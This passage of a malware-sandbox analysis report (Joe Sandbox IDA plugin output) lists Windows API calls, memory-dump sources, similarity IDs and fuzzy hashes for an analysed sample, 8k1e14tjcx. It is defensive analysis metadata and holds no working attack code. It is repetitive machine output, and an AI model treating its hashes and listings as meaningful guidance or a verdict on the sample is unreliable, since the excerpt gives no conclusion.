                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBB7BB: GetOEMCP.KERNEL32(00000000,?,?,00EBBA44,?), ref: 00EBB7E6
                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EBBA89,?,00000000), ref: 00EBBC64
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00EBBA89,?,?,?,00EBBA89,?,00000000), ref: 00EBBC77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E99A50,?,?,00000000,?,?,00E98CBC,?), ref: 00E99BAB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00E98411,-00009570,00000000,000007F3), ref: 00E99BB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E91E55
                                                                                                                          • Part of subcall function 00E93BBA: __EH_prolog.LIBCMT ref: 00E93BBF
                                                                                                                        • _wcslen.LIBCMT ref: 00E91EFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2838827086-0
                                                                                                                        APIs
                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E973BC,?,?,?,00000000), ref: 00E99DBC
                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E99E70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1392018926-0
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E99F27,?,?,00E9771A), ref: 00E996E6
                                                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E99F27,?,?,00E9771A), ref: 00E99716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E99EC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00E99ED4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB8E75
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00ED1098,00E917CE,?,?,00000007,?,?,?,00E913D6,?,00000000), ref: 00EB8EB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2447670028-0
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00EA10AB
                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00EA10B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1231390398-0
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641,000000FF), ref: 00E9A1F1
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641), ref: 00E9A21F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2643169976-0
                                                                                                                        APIs
                                                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00EC2641,000000FF), ref: 00EAACB0
                                                                                                                        • CoUninitialize.COMBASE(?,?,?,?,00EC2641,000000FF), ref: 00EAACB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3856339756-0
                                                                                                                        • Opcode ID: 398eb028d7fc2e4152a1242ad51d2e20aab947fcca28f1037080336b363e5bfd
                                                                                                                        • Instruction ID: ef60fc8505f6eb397acbae6229c7174888a40c0885f69bc4c5577daa826102b2
                                                                                                                        • Opcode Fuzzy Hash: 398eb028d7fc2e4152a1242ad51d2e20aab947fcca28f1037080336b363e5bfd
                                                                                                                        • Instruction Fuzzy Hash: 5DE06572544650EFCB10DB5DDD06F45FBA8FB89B20F00426AF416E3760CB746801CA90
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00E9A23A,?,00E9755C,?,?,?,?), ref: 00E9A254
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E9A23A,?,00E9755C,?,?,?,?), ref: 00E9A280
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        • Opcode ID: c0f42bd8106d6d7b9834470f422e0afa0e83bfd5e7156174ea43fb7a59c3cead
                                                                                                                        • Instruction ID: 031baf77328802fb0d8df85c8dc2b51614a327dc37cc20ba45babd3e2c2cf8b7
                                                                                                                        • Opcode Fuzzy Hash: c0f42bd8106d6d7b9834470f422e0afa0e83bfd5e7156174ea43fb7a59c3cead
                                                                                                                        • Instruction Fuzzy Hash: 33E092325001246BCF20AB68DC05BD9B798AB083E5F044271FD44F32A4D771DE45CAE0
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00EADEEC
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00EADF03
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718869927-0
                                                                                                                        • Opcode ID: 1c678c74b460ecc8ae517ddc471927c9f0e133be47327764d55fdb0d8de624b3
                                                                                                                        • Instruction ID: 638cc92ce36cca84cc0a6535b68a17b2195e5c89772053bbed58541559f2d07a
                                                                                                                        • Opcode Fuzzy Hash: 1c678c74b460ecc8ae517ddc471927c9f0e133be47327764d55fdb0d8de624b3
                                                                                                                        • Instruction Fuzzy Hash: 84E09BB14002482ADF01A761DC06F9E3BAC9B05785F440492B204FA1A3DA74E6148661
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1175261203-0
                                                                                                                        • Opcode ID: 5a9360ab20098fa5911a5774b84f623f508cad3e63cbda158a0150ff8896ad3a
                                                                                                                        • Instruction ID: 2e9a625ba0e5da5cadcc9eb7084b6585eed3bbf34bfc3e7d977f2dd8a9705697
                                                                                                                        • Opcode Fuzzy Hash: 5a9360ab20098fa5911a5774b84f623f508cad3e63cbda158a0150ff8896ad3a
                                                                                                                        • Instruction Fuzzy Hash: 8AE01A768001686ADB11ABA5AC09FDA7BACAF0D391F044065B649F2144DA74EA858AB0
                                                                                                                        APIs
                                                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EAA3DA
                                                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00EAA3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1918208029-0
                                                                                                                        • Opcode ID: 557fbbfb510b996d0fc03648b803b92f269001e5059ad3564b00ff2661010e5e
                                                                                                                        • Instruction ID: 8920aea560775119333ce068fb58367e0a3ad5ce9d7f076e979ea61930058896
                                                                                                                        • Opcode Fuzzy Hash: 557fbbfb510b996d0fc03648b803b92f269001e5059ad3564b00ff2661010e5e
                                                                                                                        • Instruction Fuzzy Hash: 03E0ED71500218EBCB20DF55C545B9DBBF8EB19364F10906AA846A7341E374BE04DBA1
                                                                                                                        APIs
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EB2BAA
                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00EB2BB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1660781231-0
                                                                                                                        • Opcode ID: cdc9fda4a270329248af961d83f9dc910753db1ecfe353b02636f7de362cb449
                                                                                                                        • Instruction ID: bccfd75891942b31ed07bff55d934d91d7b0d3ab23ad882a8f4c32c8af93d346
                                                                                                                        • Opcode Fuzzy Hash: cdc9fda4a270329248af961d83f9dc910753db1ecfe353b02636f7de362cb449
                                                                                                                        • Instruction Fuzzy Hash: DDD0223925430918CC182EB0288F8DB37C5EE42BB87B0379EF320B54C1EF129040A021
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3351165006-0
                                                                                                                        • Opcode ID: 5da1b3f3f332f406dadc506faa2b16d86fa6346d9362f1b3a8f9d4652d596192
                                                                                                                        • Instruction ID: 37f7c6d7aa8f3d5c9be919014e2c65b529d9429b5aa078e0be440a0a9270ba07
                                                                                                                        • Opcode Fuzzy Hash: 5da1b3f3f332f406dadc506faa2b16d86fa6346d9362f1b3a8f9d4652d596192
                                                                                                                        • Instruction Fuzzy Hash: BAC0123205C200BECB010BB5DC09C3BBBA8ABE5312F24C908B0A5D0061C238C114DB11
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
